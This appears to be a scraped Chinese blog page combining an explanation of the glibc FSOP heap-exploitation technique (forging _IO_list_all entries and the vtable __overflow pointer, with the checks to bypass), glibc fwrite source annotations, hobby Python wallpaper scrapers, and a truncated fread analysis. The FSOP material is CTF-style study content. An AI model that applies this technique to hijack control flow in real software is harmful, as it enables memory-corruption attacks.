0%

IO_FILE源码分析:FSOP

vtable

IO_FILE结构体里面有个很重要的数据结构 —— vtable

vtable 采用虚表调用的形式,如果劫持了 vtable ,就可以调用我们需要的任意函数,甚至可以伪造 vtable ,使程序错误使用我们构造的 fake vtable

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
pwndbg> p/x*(struct _IO_FILE_plus*)_IO_list_all
$1 = {
file = {
_flags = 0xfbad2086,
_IO_read_ptr = 0x0,
_IO_read_end = 0x0,
_IO_read_base = 0x0,
_IO_write_base = 0x0,
_IO_write_ptr = 0x0,
_IO_write_end = 0x0,
_IO_buf_base = 0x0,
_IO_buf_end = 0x0,
_IO_save_base = 0x0,
_IO_backup_base = 0x0,
_IO_save_end = 0x0,
_markers = 0x0,
_chain = 0x7ffff7dd2620, // 指向下一个链表节点(stderr的下一个:stdout)
_fileno = 0x2, // fileno值为2(标准错误流的文件描述符就是'2')
_flags2 = 0x0,
_old_offset = 0xffffffffffffffff,
_cur_column = 0x0,
_vtable_offset = 0x0,
_shortbuf = {0x0},
_lock = 0x7ffff7dd3770,
_offset = 0xffffffffffffffff,
_codecvt = 0x0,
_wide_data = 0x7ffff7dd1660,
_freeres_list = 0x0,
_freeres_buf = 0x0,
__pad5 = 0x0,
_mode = 0x0,
_unused2 = {0x0 <repeats 20 times>}
},
vtable = 0x7ffff7dd06e0 // target
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
pwndbg> p*(struct _IO_jump_t*)_IO_list_all.vtable // vtable的所有字段都可以劫持
$6 = {
__dummy = 0,
__dummy2 = 0,
__finish = 0x7ffff7a869d0 <_IO_new_file_finish>,
__overflow = 0x7ffff7a87740 <_IO_new_file_overflow>,
__underflow = 0x7ffff7a874b0 <_IO_new_file_underflow>,
__uflow = 0x7ffff7a88610 <__GI__IO_default_uflow>,
__pbackfail = 0x7ffff7a89990 <__GI__IO_default_pbackfail>,
__xsputn = 0x7ffff7a861f0 <_IO_new_file_xsputn>,
__xsgetn = 0x7ffff7a85ed0 <__GI__IO_file_xsgetn>,
__seekoff = 0x7ffff7a854d0 <_IO_new_file_seekoff>,
__seekpos = 0x7ffff7a88a10 <_IO_default_seekpos>,
__setbuf = 0x7ffff7a85440 <_IO_new_file_setbuf>,
__sync = 0x7ffff7a85380 <_IO_new_file_sync>,
__doallocate = 0x7ffff7a7a190 <__GI__IO_file_doallocate>,
__read = 0x7ffff7a861b0 <__GI__IO_file_read>,
__write = 0x7ffff7a85b80 <_IO_new_file_write>,
__seek = 0x7ffff7a85980 <__GI__IO_file_seek>,
__close = 0x7ffff7a85350 <__GI__IO_file_close>,
__stat = 0x7ffff7a85b70 <__GI__IO_file_stat>,
__showmanyc = 0x7ffff7a89b00 <_IO_default_showmanyc>,
__imbue = 0x7ffff7a89b10 <_IO_default_imbue>
}

下面是 raycp 大佬对 vtable 调用的总结

fread 函数中调用的 vtable 函数有:

  • _IO_sgetn函数调用了vtable的_IO_file_xsget
  • _IO_doallocbuf函数调用了vtable的_IO_file_doallocate以初始化输入缓冲区
  • vtable中的_IO_file_doallocate调用了vtable中的__GI__IO_file_stat以获取文件信息
  • __underflow函数调用了vtable中的_IO_new_file_underflow实现文件数据读取
  • vtable中的_IO_new_file_underflow调用了vtable__GI__IO_file_read最终去执行系统调用read

fwrite 函数调用的 vtable 函数有:

  • _IO_fwrite函数调用了vtable的_IO_new_file_xsputn
  • _IO_new_file_xsputn函数调用了vtable中的_IO_new_file_overflow实现缓冲区的建立以及刷新缓冲区
  • vtable中的_IO_new_file_overflow函数调用了vtable的_IO_file_doallocate以初始化输入缓冲区
  • vtable中的_IO_file_doallocate调用了vtable中的__GI__IO_file_stat以获取文件信息
  • new_do_write中的_IO_SYSWRITE调用了vtable_IO_new_file_write最终去执行系统调用write

fclose 函数调用的 vtable 函数有:

  • 在清空缓冲区的_IO_do_write函数中会调用vtable中的函数
  • 关闭文件描述符_IO_SYSCLOSE函数为vtable中的__close函数
  • _IO_FINISH函数为vtable中的__finish函数

FSOP

终于到今天的主角了,FSOP全称是 File Stream Oriented Programming ,它的核心就在于伪造 _IO_list_all 指针( _IO_list_all 永远指向当前FILE结构体链的第一个元素)

  • 这个技术的核心就是劫持 _IO_list_all 的值来伪造链表和其中的 _IO_FILE 项,但是单纯的伪造只是构造了数据还需要某种方法进行触发
  • FSOP 选择的触发方法是调用 _IO_flush_all_lockp,这个函数会刷新 _IO_list_all 链表中所有项的文件流(相当于对每个FILE调用 fflush),也对应着会调用 _IO_FILE_plus.vtable 中的 IO_overflow 函数
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
_IO_flush_all_lockp (int do_lock)
{
int result = 0;
FILE *fp;
#ifdef _IO_MTSAFE_IO
_IO_cleanup_region_start_noarg (flush_cleanup);
_IO_lock_lock (list_all_lock);
#endif
for (fp = (FILE *) _IO_list_all; fp != NULL; fp = fp->_chain)
{
run_fp = fp;
if (do_lock)
_IO_flockfile (fp);
if (((fp->_mode <= 0 && fp->_IO_write_ptr > fp->_IO_write_base)/*一些检查,需要绕过*/
|| (_IO_vtable_offset (fp) == 0
&& fp->_mode > 0 && (fp->_wide_data->_IO_write_ptr
> fp->_wide_data->_IO_write_base))/*也可以绕过这个*/
)
&& _IO_OVERFLOW (fp, EOF) == EOF)/*遍历_IO_list_all ,选出_IO_FILE作为_IO_OVERFLOW的参数,执行函数*/
result = EOF;
if (do_lock)
_IO_funlockfile (fp);
run_fp = NULL;
}
#ifdef _IO_MTSAFE_IO
_IO_lock_unlock (list_all_lock);
_IO_cleanup_region_end (0);
#endif
return result;
}

IO_flush_all_lockp 函数触发条件:

  • 当 libc 执行 abort 流程时,abort 可以通过触发 malloc_printerr 来触发
  • 当执行 exit 函数时
  • 当执行流从 main 函数返回时

FSOP 攻击的前提条件:

  • 泄露出 libc 地址,知道 _IO_lsit_all 的地址
  • 任意地址写的能力,修改 _IO_list_all 为可控的地址
  • 可以在可控内存中伪造 _IO_FILE_plus 结构

伪造的 _IO_FILE_plus 结构体要绕过的 check:

1
2
3
1.((fp->_mode <= 0 && fp->_IO_write_ptr > fp->_IO_write_base)
或者是
2._IO_vtable_offset (fp) == 0 && fp->_mode > 0 && (fp->_wide_data->_IO_write_ptr > fp->_wide_data->_IO_write_base)

FSOP 利用姿势

在考虑进行 FSOP 攻击时,常常不会有可控的 WAA,这时我们利用 unsortedbin attack 在 _IO_list_all 中写入 main_arena + 88 的地址,那么程序就会把 main_arena + 88 当做FILE结构体

然后 main_arena + 0xc0(88+0x68) 的位置就是FILE结构体的 _chain 条目,同时,main_arena + 0xc0 也会指向对应大小为“0x60”的 smallbin,那么大小为“0x60”的smallbin就会被程序当成下一个FILE结构体

到了这里通常有两种应对方式,一是直接申请大小为“0x60”的chunk,把它放入对应 smallbin 的头部,然后在其内部进行伪造,二是通过堆溢出等方式,修改 unsortedbin 的size为“0x61”(注意规避合并机制),再次申请 chunk,该 unsortedbin 就会被放入 smallbin

接下来就是对 FILE 结构体的伪造,只需要伪造 vtable 的指向地址,然后再该地址处写入 fake vtable 就可以了

而在对 vtable 的伪造中,主要是伪造 _IO_OVERFLOW 条目(第4个),因为程序对FILE结构的破坏,导致程序会触发报错提示,根据程序调用链发现中途会调用 _IO_OVERFLOW ,正好可以被控制

这就是 FSOP 的全过程了,可以去学习 house of orange 进行巩固


文字描述有点多,需要根据题目过一遍

IO_FILE源码分析:fwrite

直接上源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
_IO_size_t
_IO_fwrite (buf, size, count, fp)
const void *buf;
_IO_size_t size;
_IO_size_t count;
_IO_FILE *fp;
{
_IO_size_t request = size * count;
_IO_size_t written = 0;
CHECK_FILE (fp, 0);
if (request == 0)
return 0;
_IO_cleanup_region_start ((void (*) __P ((void *))) _IO_funlockfile, fp);
_IO_flockfile (fp);
if (fp->_vtable_offset != 0 || _IO_fwide (fp, -1) == -1)
written = _IO_sputn (fp, (const char *) buf, request); /* vtable->__xsputn */
_IO_funlockfile (fp);
_IO_cleanup_region_end (0);
if (written == request)
return count;
else
return written / size;
}

这里重点关注一下 _IO_sputn 函数(vtable->__xsputn),其他的东西都不用管

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
# define _IO_new_file_xsputn _IO_file_xsputn

_IO_size_t
_IO_new_file_xsputn (f, data, n) /* n==request */
_IO_FILE *f;
const void *data;
_IO_size_t n;
{
register const char *s = (const char *) data;
_IO_size_t to_do = n;
int must_flush = 0;
_IO_size_t count;

if (n <= 0)
return 0;

/* First figure out how much space is available in the buffer. */
count = f->_IO_write_end - f->_IO_write_ptr; /* 判断输出缓冲区还有多少空间 */
if ((f->_flags & _IO_LINE_BUF) && (f->_flags & _IO_CURRENTLY_PUTTING))
{
count = f->_IO_buf_end - f->_IO_write_ptr; /* 判断输出缓冲区还有多少空间 */
if (count >= n) /* 输出缓冲区够用 */
{
register const char *p;
for (p = s + n; p > s; )
{
if (*--p == '\n')
{
count = p - s + 1; /* 重新调整输出缓冲区的可用size */
must_flush = 1;
break;
}
}
}
}
/* Then fill the buffer. */
if (count > 0) /* 如果输出缓冲区有空间,则先把数据拷贝至输出缓冲区 */
{
if (count > to_do)
count = to_do;
if (count > 20)
{
#ifdef _LIBC
f->_IO_write_ptr = __mempcpy (f->_IO_write_ptr, s, count);
#else
memcpy (f->_IO_write_ptr, s, count); /* 将目标输出数据拷贝至输出缓冲区 */
f->_IO_write_ptr += count;
#endif
s += count; /* 计算是否还有目标输出数据剩余 */
}
else
{
register char *p = f->_IO_write_ptr;
register int i = (int) count;
while (--i >= 0)
*p++ = *s++;
f->_IO_write_ptr = p;
}
to_do -= count; /* 计算是否还有目标输出数据剩余 */
}
if (to_do + must_flush > 0)
/* 如果还有目标数据剩余,此时则表明输出缓冲区未建立或输出缓冲区已经满了 */
{
_IO_size_t block_size, do_write;
/* Next flush the (full) buffer. */
if (_IO_OVERFLOW (f, EOF) == EOF)
return n - to_do;

/* Try to maintain alignment: write a whole number of blocks.
dont_write is what gets left over. */
block_size = f->_IO_buf_end - f->_IO_buf_base; /* 检查输出数据是否是大块 */
do_write = to_do - (block_size >= 128 ? to_do % block_size : 0);

if (do_write)
{
count = new_do_write (f, s, do_write);
to_do -= count;
if (count < do_write)
return n - to_do;
}

/* Now write out the remainder. Normally, this will fit in the
buffer, but it's somewhat messier for line-buffered files,
so we let _IO_default_xsputn handle the general case. */
if (to_do)
to_do -= _IO_default_xsputn (f, s+do_write, to_do);
}
return n - to_do;
}

fwrite 的主要实现在 _IO_new_file_xsputn 中,整体流程包含四个部分:

  • 首先判断输出缓冲区还有多少剩余,如果有剩余则将目标输出数据拷贝至输出缓冲区(能拷贝多少就拷贝多少)
  • 如果输出缓冲区没有剩余(输出缓冲区未建立也是没有剩余)或输出缓冲区不够则调用 _IO_OVERFLOW 建立输出缓冲区或刷新输出缓冲区
  • 输出缓冲区刷新后判断剩余的目标输出数据是否超过块的size,如果超过块的size,则不通过输出缓冲区直接以块为单位,使用 new_do_write 输出目标数据
  • 如果按块输出数据后还剩下一点数据则调用 _IO_default_xsputn 将数据拷贝至输出缓冲

接下来就分析这些过程:(第一部分在注释中已经解释了,略过)

建立输出缓冲区或刷新输出缓冲区

1
2
3
4
5
6
7
 if (to_do + must_flush > 0) 
/* 如果还有目标数据剩余,此时则表明输出缓冲区未建立或输出缓冲区已经满了 */
{
_IO_size_t block_size, do_write;
if (_IO_OVERFLOW (f, EOF) == EOF)
return n - to_do;
......

追踪进入 _IO_OVERFLOW :

1
#define _IO_OVERFLOW(FP, CH) JUMP1 (__overflow, FP, CH)

可以发现 _IO_OVERFLOW 的调用是虚表调用(可以进行劫持或伪造,FSOP惯用手段),其指向内容为 _IO_new_file_overflow

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
# define _IO_new_file_overflow _IO_file_overflow

int
_IO_new_file_overflow (f, ch)
_IO_FILE *f;
int ch;
{
if (f->_flags & _IO_NO_WRITES)
/* 检测IO_FILE的_flags是否包含_IO_NO_WRITES标志位 */
{
f->_flags |= _IO_ERR_SEEN;
__set_errno (EBADF);
return EOF;
}

if ((f->_flags & _IO_CURRENTLY_PUTTING) == 0 || f->_IO_write_base == 0)
{
if (f->_IO_write_base == 0) /* 表明输出缓冲区尚未建立 */
{
_IO_doallocbuf (f); /* 调用_IO_doallocbuf函数去分配输出缓冲区 */
_IO_setg (f, f->_IO_buf_base, f->_IO_buf_base, f->_IO_buf_base);
}
/* Otherwise must be currently reading.
If _IO_read_ptr (and hence also _IO_read_end) is at the buffer end,
logically slide the buffer forwards one block (by setting the
read pointers to all point at the beginning of the block). This
makes room for subsequent output.
Otherwise, set the read pointers to _IO_read_end (leaving that
alone, so it can continue to correspond to the external position). */
if (f->_IO_read_ptr == f->_IO_buf_end) /* 初始化其他指针 */
f->_IO_read_end = f->_IO_read_ptr = f->_IO_buf_base;
f->_IO_write_ptr = f->_IO_read_ptr;
f->_IO_write_base = f->_IO_write_ptr;
f->_IO_write_end = f->_IO_buf_end;
f->_IO_read_base = f->_IO_read_ptr = f->_IO_read_end;

f->_flags |= _IO_CURRENTLY_PUTTING;
if (f->_mode <= 0 && f->_flags & (_IO_LINE_BUF+_IO_UNBUFFERED))
f->_IO_write_end = f->_IO_write_ptr;
}
if (ch == EOF)
return _IO_new_do_write(f, f->_IO_write_base,
f->_IO_write_ptr - f->_IO_write_base);
/* 执行_IO_new_do_write,利用系统调用write输出输出缓冲区 */
if (f->_IO_write_ptr == f->_IO_buf_end ) /* Buffer is really full */
if (_IO_do_flush (f) == EOF)
return EOF;
*f->_IO_write_ptr++ = ch;
if ((f->_flags & _IO_UNBUFFERED)
|| ((f->_flags & _IO_LINE_BUF) && ch == '\n'))
if (_IO_new_do_write(f, f->_IO_write_base,
f->_IO_write_ptr - f->_IO_write_base) == EOF)
return EOF;
return (unsigned char) ch;
}

该函数功能主要是实现刷新输出缓冲区或建立缓冲区,其核心部分就是“_IO_new_do_write”(其他的代码都是进行检查或者更新设置)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
# define _IO_new_do_write _IO_do_write

int
_IO_new_do_write (fp, data, to_do)
_IO_FILE *fp;
const char *data;
_IO_size_t to_do;
{
return (to_do == 0 || new_do_write (fp, data, to_do) == to_do) ? 0 : EOF;
}

static
int
new_do_write (fp, data, to_do)
_IO_FILE *fp;
const char *data;
_IO_size_t to_do;
{
_IO_size_t count;
if (fp->_flags & _IO_IS_APPENDING)
/* On a system without a proper O_APPEND implementation,
you would need to sys_seek(0, SEEK_END) here, but is
is not needed nor desirable for Unix- or Posix-like systems.
Instead, just indicate that offset (before and after) is
unpredictable. */
fp->_offset = _IO_pos_BAD;
else if (fp->_IO_read_end != fp->_IO_write_base)
{
_IO_off64_t new_pos
= _IO_SYSSEEK (fp, fp->_IO_write_base - fp->_IO_read_end, 1);
/* 调整文件偏移 */
if (new_pos == _IO_pos_BAD)
return 0;
fp->_offset = new_pos;
}
count = _IO_SYSWRITE (fp, data, to_do); /* 利用系统调用更新输出缓冲区 */
if (fp->_cur_column && count)
fp->_cur_column = _IO_adjust_column (fp->_cur_column - 1, data, count) + 1;
_IO_setg (fp, fp->_IO_buf_base, fp->_IO_buf_base, fp->_IO_buf_base);
/* 刷新设置缓冲区指针 */
fp->_IO_write_base = fp->_IO_write_ptr = fp->_IO_buf_base;
fp->_IO_write_end = (fp->_mode <= 0
&& (fp->_flags & (_IO_LINE_BUF+_IO_UNBUFFERED))
? fp->_IO_buf_base : fp->_IO_buf_end);
return count;
}

以块为单位直接输出数据

1
2
3
4
5
6
7
8
9
10
11
12
13
14
      /* Try to maintain alignment: write a whole number of blocks.
dont_write is what gets left over. */
block_size = f->_IO_buf_end - f->_IO_buf_base; /* 检查输出数据是否是大块 */
do_write = to_do - (block_size >= 128 ? to_do % block_size : 0);
/* 如果超过输入缓冲区"f->_IO_buf_end - f->_IO_buf_base"的大小,则为了提高效率,不再使用输出缓冲区 */

if (do_write)
{
count = new_do_write (f, s, do_write);
/* 以块为基本单位直接将缓冲区调用new_do_write输出 */
to_do -= count;
if (count < do_write)
return n - to_do;
}

已经经历过了 _IO_OVERFLOW ,此时的IO FILE缓冲区指针的状态是处于刷新的初始化状态,输出缓冲区中也没有数据

根据输出size的大小,判断是否需要继续使用输出缓存区

剩余目标输出数据放入输出缓冲区中

1
2
3
4
5
6
     /* Now write out the remainder.  Normally, this will fit in the
buffer, but it's somewhat messier for line-buffered files,
so we let _IO_default_xsputn handle the general case. */
if (to_do)
to_do -= _IO_default_xsputn (f, s+do_write, to_do);
}

跟进函数 _IO_default_xsputn :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
_IO_size_t
_IO_default_xsputn (f, data, n)
_IO_FILE *f;
const void *data;
_IO_size_t n;
{
const char *s = (char *) data;
_IO_size_t more = n;
if (more <= 0)
return 0;
for (;;)
{
/* Space available. */
_IO_ssize_t count = f->_IO_write_end - f->_IO_write_ptr;
if (count > 0)
{
if ((_IO_size_t) count > more)
count = more;
if (count > 20) /* 当长度大于20时,使用memcpy拷贝 */
{
#ifdef _LIBC
f->_IO_write_ptr = __mempcpy (f->_IO_write_ptr, s, count);
#else
memcpy (f->_IO_write_ptr, s, count);
f->_IO_write_ptr += count;
#endif
s += count;
}
else if (count <= 0)
count = 0;
else /* 当长度小于20时,使用for循环赋值拷贝 */
{
char *p = f->_IO_write_ptr;
_IO_ssize_t i;
for (i = count; --i >= 0; )
*p++ = *s++;
f->_IO_write_ptr = p;
}
more -= count;
}
if (more == 0 || _IO_OVERFLOW (f, (unsigned char) *s++) == EOF)
/* 如果输出缓冲区为空,则调用_IO_OVERFLOW进行输出 */
break;
more--;
}
return n - more;
}

函数最主要的作用就是将剩余的目标输出数据拷贝到输出缓冲区里


在 fwrite 的源码分析中,我们发现了一个老朋友: _IO_OVERFLOW

_IO_OVERFLOW 可是FSOP的常客,因为发生内存错误时会调用 _IO_flush_all_lockp ,进而调用 _IO_OVERFLOW ,就是因为它容易触发并且容易被劫持(或伪造),FSOP才拥有如此广阔的应用范围

后续的漏洞利用分析中,我会重点分析FSOP的原理,主要原因还是我做了一个FSOP和堆上ORW相结合的题目(做的我想吐),趁着印象还比较深刻,想总结分析一下(还有个原因就是:之前总结的FSOP有点草率)

爬虫小子:二次元的福音

计算机底层知识学累了,偶尔搞点不一定的来奖励自己(大雾)

最近在学习《Python网络数据采集》这本书,了解了许多与网络相关的知识,也体验了一下面向对象的程序设计,当然主要是学习爬虫的相关知识

自我感觉爬虫很容易上手,但精通可能够呛(特别是在反爬技术越来越高超的当下),这里就记录一下我的写的垃圾爬虫吧……

爬虫小子_V1.0

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
from urllib.request import urlopen
from bs4 import BeautifulSoup

import requests as req
import os

def GetURL():
target = input("please input your target:")
html = urlopen(target)
bsObj = BeautifulSoup(html, "html.parser")
images = bsObj.findAll("img", {"class": "rich_pages wxw-img"})
return images

def CreateImages(images,name):
i=0
for image in images:
i = i + 1
response = image.attrs["data-src"]
print("finish!!!, now you get "+str(i)+" images")
num = "test_" + str(i)
dtype = response.split('=')[-1]
num += '.' + dtype
response = req.get(response)
os.makedirs(name, exist_ok=True)
with open(name+ '/' +num, 'wb')as f:
f.write(response.content)

images=GetURL()
CreateImages(images,name=input("please input its name:"))

看看效果:

这里就不放图了,饥渴的兄弟可以自己爬一下……

更新日志:

  • version:v1.0
  • date:2022.3.31
  • type:
    • Features:NULL
    • Changed:NULL
    • Removed:NULL
  • desc:
    • 第一代版本,功能很弱

爬虫小子_V1.1

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
from urllib.request import urlopen
from bs4 import BeautifulSoup
import requests as req
import random
import time
import os

nowTime = time.time()
random.seed(nowTime)

def GetURL():
target = input("please input your target:")
html = urlopen(target)
bsObj = BeautifulSoup(html, "html.parser")
return bsObj

def GetRandomURL(link_list):
target = link_list[random.randint(0, len(link_list) - 1)]
html = urlopen(target)
bsObj = BeautifulSoup(html, "html.parser")
name = GetName(bsObj)
print("The next one is " + name)
print("Do you want to Download it?")
choice = input("Please input yes or no\n")
if choice == "yes":
print("You want to Continue OK~~~")
images = Getimage(bsObj)
Download(images, name)
elif choice == "no":
print("Try again?")
choice = input("Please input yes or no\n")
if choice == "yes":
GetRandomURL(link_list)
else:
Exit()
else:
print("Wrong choice~~~~")
Exit()

def More():
print("Do you want more?")
choice = input("Please input yes or no\n")
if choice == "yes":
print("hahaha I know you~~~~")
Return()
elif choice == "no":
Exit()
else:
print("Wrong choice~~~~")
Exit()
More()

def Return():
target = "https://mp.weixin.qq.com/mp/appmsgalbum?__biz=MzUzNjA0MjkxMw==&action=getalbum&album_id=2119868775733706753&scene=173&from_msgid=2247561088&from_itemidx=1&count=3&nolastread=1#wechat_redirect"
html = urlopen(target)
bsObj = BeautifulSoup(html, "html.parser")
link_list = GetLinks(bsObj)
GetRandomURL(link_list)

def Getimage(bsObj):
images = bsObj.findAll("img", {"class": "rich_pages wxw-img"})
return images

def GetName(bsObj):
title = bsObj.find("h1", {"class": "rich_media_title"})
name = "image-" + title.string.split('【二次元壁纸分享】')[-1][:3]
return name

def GetLinks(bsObj):
links = bsObj.findAll("li",{"class": "album__list-item js_album_item js_wx_tap_highlight wx_tap_cell"})
link_list = []
for link in links:
if link.attrs['data-link'] is not None:
if link.attrs['data-link'] not in link_list:
link_list.append(link.attrs['data-link'])
return link_list

def Download(images,name):
i=0
for image in images:
i=i+1
print("finish!!!, now you get " + str(i) + " images")
response = image.attrs["data-src"]
num = name + "-" + str(i)
dtype = response.split('=')[-1]
num += '.' + dtype
response = req.get(response)
os.makedirs(name, exist_ok=True)
with open(name+ '/' +num, 'wb')as f:
f.write(response.content)

def Exit():
print("exit~~~~bye~~~~")
exit(0)

bsObj=GetURL()
images=Getimage(bsObj)
name=GetName(bsObj)
Download(images,name)
More()

更新日志:

  • version:v1.1
  • date:2022.4.2
  • type:
    • Features:Download完毕以后可以选择继续Download,可以索引部分内部链接用于Download,加强了爬虫的互动性
    • Changed:NULL
    • Removed:删除了输入文件名的操作
  • desc:
    • 功能有些许加强,但没有质变

爬虫小子_V1.2

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
from urllib.request import urlopen
from bs4 import BeautifulSoup
import requests as req
import os

n = 0

def GetNextURL(target):
html = urlopen(target)
bsObj = BeautifulSoup(html, "html.parser")
name = GetName(bsObj)
print("The next one is " + name)
return bsObj

def GetAllURL():
target = "https://mp.weixin.qq.com/mp/appmsgalbum?__biz=MzUzNjA0MjkxMw==&action=getalbum&album_id=2119868775733706753&scene=173&from_msgid=2247561088&from_itemidx=1&count=3&nolastread=1#wechat_redirect"
html = urlopen(target)
bsObj = BeautifulSoup(html, "html.parser")
link_list = GetLinks(bsObj)
return link_list

def Getimage(bsObj):
images = bsObj.findAll("img", {"class": "rich_pages wxw-img"})
return images

def GetName(bsObj):
title = bsObj.find("h1", {"class": "rich_media_title"})
name = "image-" + title.string.split('【二次元壁纸分享】')[-1][:3]
return name

def GetLinks(bsObj):
links = bsObj.findAll("li",{"class": "album__list-item js_album_item js_wx_tap_highlight wx_tap_cell"})
link_list = []
for link in links:
if link.attrs['data-link'] is not None:
if link.attrs['data-link'] not in link_list:
link_list.append(link.attrs['data-link'])
return link_list

def DownloadApart(images,name):
global n
i = 0
for image in images:
i += 1
n += 1
print("finish!!!, now you get " + str(n) + " images")
response = image.attrs["data-src"]
num = name + "-" + str(i)
dtype = response.split('=')[-1]
num += '.' + dtype
response = req.get(response)
os.makedirs(name, exist_ok=True)
with open(name+ '/' +num, 'wb')as f:
f.write(response.content)

def DownloadTogether(images,name):
global n
i = 0
for image in images:
i += 1
n += 1
print("finish!!!, now you get " + str(n) + " images")
response = image.attrs["data-src"]
num = name + "-" + str(i)
dtype = response.split('=')[-1]
num += '.' + dtype
response = req.get(response)
with open(num, 'wb')as f:
f.write(response.content)

print("Do you want to Together or Apart?")
choice = input("Please input 't' for Together 'a' for Apart\n")

link_list = GetAllURL()
for link in link_list:
bsObj = GetNextURL(link)
images = Getimage(bsObj)
name = GetName(bsObj)

if choice == "t":
DownloadTogether(images,name)
elif choice == "a":
DownloadApart(images,name)
else:
print("Wrong choice~~~~")

print("All images finish!!!!!")

一口气干了 181 张,可以可以……

更新日志:

  • version:v1.2
  • date:2022.4.2
  • type:
    • Features:可以选择把图片分开进行存储或者统一存储
    • Changed:改变了设计思路,点开即使用,不需要过多的操作
    • Removed:删除了大量的控制操作
  • desc:
    • v1.1 的变种,旨在快速获取大量图片,减少操作频率,但程序也因此不可控制,会重复Download相同的图片
    • 有时需要手动调整输出文件的目录

爬虫小子_V1.3

桌宠特供版,对代码进行了优化,并把函数用类组织起来

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
from urllib.request import urlopen
from bs4 import BeautifulSoup
import requests as req
import os

class Crawler():
def __init__(self):
self.stop = 0
self.n = 0

def GetNextURL(self,target):
self.html = urlopen(target)
self.bsObj = BeautifulSoup(self.html, "html.parser")
self.name = self.GetName(self.bsObj)
if self.name == None:
print("Something wrong...")
else:
print("The next one is " + self.name)
return self.bsObj

def GetAllURL(self):
#self.target = "https://mp.weixin.qq.com/mp/appmsgalbum?__biz=MzUzNjA0MjkxMw==&action=getalbum&album_id=2119868775733706753&scene=173&from_msgid=2247561088&from_itemidx=1&count=3&nolastread=1#wechat_redirect"
self.target = "https://mp.weixin.qq.com/mp/appmsgalbum?__biz=MzUzNjA0MjkxMw==&action=getalbum&album_id=2342983337092759553&scene=173&from_msgid=2247561474&from_itemidx=1&count=3&nolastread=1#wechat_redirect"
self.html = urlopen(self.target)
self.bsObj = BeautifulSoup(self.html, "html.parser")
self.link_list = self.GetLinks(self.bsObj)
return self.link_list

def Getimage(self,bsObj):
self.images = bsObj.findAll("img", {"class": "rich_pages wxw-img"})
return self.images

def GetName(self,bsObj):
self.title = bsObj.find("h1", {"class": "rich_media_title"})
self.name = self.title.string.split('【二次元动漫壁纸】')[-1][:3]
if self.name.isdigit():
return "image-" + self.name
else:
self.ame = self.title.string.split('【二次元壁纸分享】')[-1][:3]
if self.name.isdigit():
return "image-" + self.name
else:
return None

def GetLinks(self,bsObj):
self.links = bsObj.findAll("li",{"class": "album__list-item js_album_item js_wx_tap_highlight wx_tap_cell"})
self.link_list = []
for link in self.links:
if link.attrs['data-link'] is not None:
if link.attrs['data-link'] not in self.link_list:
self.link_list.append(link.attrs['data-link'])
return self.link_list

def DownloadTogether(self,images,name):
self.i = 0
for image in images:
self.i += 1
self.n += 1
self.response = image.attrs["data-src"]
self. num = name + "-" + str(self.i)
self.dtype = self.response.split('=')[-1]
self.num += '.' + self.dtype
self.response = req.get(self.response)
print("finish!!!, now you get " + str(self.n) + " => "+self.num)
self.path = os.path.join("D:\\PythonProject\\Images",self.num)
with open(self.path, 'wb')as f:
f.write(self.response.content)

def Start(self):
self.link_list = self.GetAllURL()
for link in self.link_list:
if self.stop == 1:
print("OK quit....")
return None
self.bsObj = self.GetNextURL(link)
self.images = self.Getimage(self.bsObj)
self.name = self.GetName(self.bsObj)
if self.name != None:
self.DownloadTogether(self.images,self.name)

def Stop(self):
self.stop = 1

if __name__=="__main__":
crawler = Crawler()
crawler.Start()

更新日志:

  • version:v1.3
  • date:2022.5.14
  • type:
    • Features:
      • 用类对函数进行了组织
      • 添加了 Stop 功能
      • 修了一些 BUG
    • Changed:
      • 固定了文件保存的路径(用绝对路径写死)
    • Removed:
      • 删除了分离储存,现在只能进行统一存储
  • desc:
    • 这款爬虫是为桌宠准备的,在功能上几乎没有提升(甚至还有阉割)

IO_FILE源码分析:fread

但程序从键盘读入数据时,程序会先把数据存储到“输入缓存区”中

直接上源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
_IO_size_t
_IO_fread (buf, size, count, fp)
void *buf;
_IO_size_t size;
_IO_size_t count;
